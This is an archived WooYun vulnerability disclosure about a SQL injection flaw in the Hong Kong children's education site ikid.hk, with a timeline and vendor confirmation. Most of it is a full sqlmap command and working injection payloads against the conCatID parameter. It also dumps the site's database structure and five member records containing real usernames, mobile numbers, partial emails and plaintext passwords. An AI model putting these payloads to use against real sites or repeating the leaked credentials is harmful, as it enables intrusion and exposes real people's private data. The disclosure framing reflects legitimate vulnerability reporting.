乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经确认,细节仅向厂商公开 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
全新推出的兒童教育網站ikid.hk,為全港家長帶來嶄新網絡體驗。網站不單囊括了城中最優秀尖子培育課程,協助家長為孩子挑選最合適的提升課程外,更滙聚了眾多資深教育專家、大學教授、註冊心理學家、兒科專科醫生、營養師等專業人士的意見及訪問。此外,家長可以在此瀏覽到全港各中、小學及幼稚園的背景資料及最新活動消息;而網站更搜羅大量嬰幼兒產品、服飾、親子好去處等資訊,讓家長輕易地掌握學習、情緒管理、消閒娛樂以至升學前途等全面教養資訊,從而培育出優秀頂尖的孩子。
地址:http://**.**.**.**/article/detail?conCatID=416&contentID=11191
$ python sqlmap.py -u "http://**.**.**.**/article/detail?conCatID=416&contentID=11191" -p conCatID --technique=BE --random-agent --batch -D web266db1 -T member -C username,mobile,email,password --dump --start 1 --stop 5
| member | 2147 |
选取少数用户信息进行展示:
Database: web266db1Table: member[5 entries]+-------------+----------------+--------------------+----------+| username | mobile | email | password |+-------------+----------------+--------------------+----------+| vega0624 | 92106607 | 0624vega@**.**.**.** | py34gx || <blank> | <blank> | 111@**.**.**.** | 363363 || <blank> | <blank> | 123@**.**.**.** | 123456 || <blank> | <blank> | 1352@**.**.**.** | 987654 || caofengling | 02015975478254 | 1471481714@**.**.**.** | 830129 |+-------------+----------------+--------------------+----------+
---Parameter: conCatID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: conCatID=416') AND 2600=2600 AND ('SBTr'='SBTr&contentID=11191 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: conCatID=416') AND (SELECT 1987 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(1987=1987,1))),0x71627a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lUqI'='lUqI&contentID=11191---web server operating system: Linux CentOSweb application technology: PHP 5.4.26, Apache 2.2.27back-end DBMS: MySQL 5.0current user: 'web266u1@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'web266u1'@'localhost'Database: web266db1+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| photo | 40120 || photo_n_content | 37586 || content_n_content_category | 27544 || content | 12942 || member_notification | 5734 || shop_n_shop_category | 4962 || shop_most_viewed | 4596 || shop | 4525 || branch | 4376 || branch_n_district | 4361 || branch_resturant | 2885 || member | 2147 || magazine_subscribe_detail | 1588 || photo_n_shop | 1337 || photo_n_shop_n_award | 1174 || votes | 1158 || recruit | 940 || shop_package | 625 || video_n_magazine | 573 || forum_post | 570 || video_n_content | 565 || video | 564 || member_facebook | 559 || shop_n_award | 459 || magazine_subscribe | 417 || content_category | 375 || shop_contact | 300 || award_photo | 288 || text_shop_package | 286 || shop_category | 232 || focus_n_forum_category | 214 || award | 213 || cover | 207 || magazine_subscribe_cp | 185 || advertisement | 152 || district | 91 || award_ceremony | 82 || hot_discount | 68 || forum_category | 66 || photo_n_focus | 54 || focus_n_shop_category | 52 || people | 52 || content_map | 51 || magazine_relationship | 48 || focus | 44 || photo_n_content_category | 37 || free_magazine | 36 || magazine | 34 || pets_media | 26 || magazine_package | 12 || promotion_award | 11 || member_message | 9 || people_n_award | 9 || pets_media_n_award | 6 || tag | 6 || pets_zone | 5 || staff | 5 || content_n_tag | 4 || organisation_category | 2 || recruit_post | 2 || organisation | 1 || organisation_n_organisation_category | 1 || report | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 1206 || SESSION_VARIABLES | 329 || GLOBAL_VARIABLES | 317 || GLOBAL_STATUS | 312 || SESSION_STATUS | 312 || COLLATION_CHARACTER_SET_APPLICABILITY | 197 || COLLATIONS | 197 || PARTITIONS | 136 || TABLES | 136 || KEY_COLUMN_USAGE | 125 || STATISTICS | 125 || TABLE_CONSTRAINTS | 94 || CHARACTER_SETS | 39 || PLUGINS | 23 || SCHEMA_PRIVILEGES | 16 || ENGINES | 9 || SCHEMATA | 3 || PROCESSLIST | 2 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: web266db1Table: member[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(25) |+----------+-------------+Database: web266db1Table: rainbow_bridge[1 column]+----------------+------+| Column | Type |+----------------+------+| pass_away_date | date |+----------------+------+Database: web266db1Table: staff[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(20) |+----------+-------------+
---Parameter: conCatID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: conCatID=416') AND 2600=2600 AND ('SBTr'='SBTr&contentID=11191 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: conCatID=416') AND (SELECT 1987 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(1987=1987,1))),0x71627a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lUqI'='lUqI&contentID=11191---web server operating system: Linux CentOSweb application technology: PHP 5.4.26, Apache 2.2.27back-end DBMS: MySQL 5.0Database: web266db1Table: member[26 columns]+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+| Column | Type |+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+| accept_agreement | tinyint(1) || birthday | date || children | int(11) || country | enum('china','hongkong','macau','taiwan','others') || creation_date | datetime || education | enum('secondary','tertiaryeducation','masterdegree') || email | varchar(128) || family_income | enum('under10000','10000-14999','15000-19999','20000-24499','25000-29999','30000-34499','35000-39999','40000-49999','50000-59999','60000up') || first_name | varchar(40) || icon | varchar(256) || id_number | char(4) || last_modify_date | datetime || last_name | varchar(20) || login_time | datetime || marital_status | enum('single','married') || member_id | int(11) || member_type | enum('normal','master') || mobile | varchar(15) || notification | enum('shopping','weddinginfo','beauty','babyandkids','travel','dighitalproduct','fashion','home','pets','nailart','wine','course') || occupation | enum('professional','merchant','self_employ','manager','clerical_work','sales','housewife','student','retired','others') || password | varchar(25) || personal_income | enum('under10000','10000-14999','15000-19999','20000-24499','25000-29999','30000-34499','35000-39999','40000up') || points | int(11) || reg_source | varchar(256) || sex | enum('male','female') || username | varchar(20) |+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: conCatID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: conCatID=416') AND 2600=2600 AND ('SBTr'='SBTr&contentID=11191 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: conCatID=416') AND (SELECT 1987 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(1987=1987,1))),0x71627a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('lUqI'='lUqI&contentID=11191---web server operating system: Linux CentOSweb application technology: PHP 5.4.26, Apache 2.2.27back-end DBMS: MySQL 5.0Database: web266db1Table: member[5 entries]+-------------+----------------+--------------------+----------+| username | mobile | email | password |+-------------+----------------+--------------------+----------+| vega0624 | 92106607 | 0624vega@**.**.**.** | py34gx || <blank> | <blank> | 111@**.**.**.** | 363363 || <blank> | <blank> | 123@**.**.**.** | 123456 || <blank> | <blank> | 1352@**.**.**.** | 987654 || caofengling | 02015975478254 | 1471481714@**.**.**.** | 830129 |+-------------+----------------+--------------------+----------+
进行过滤。
危害等级:中
漏洞Rank:6
确认时间:2015-12-01 14:38
Referred to related parties.
暂无
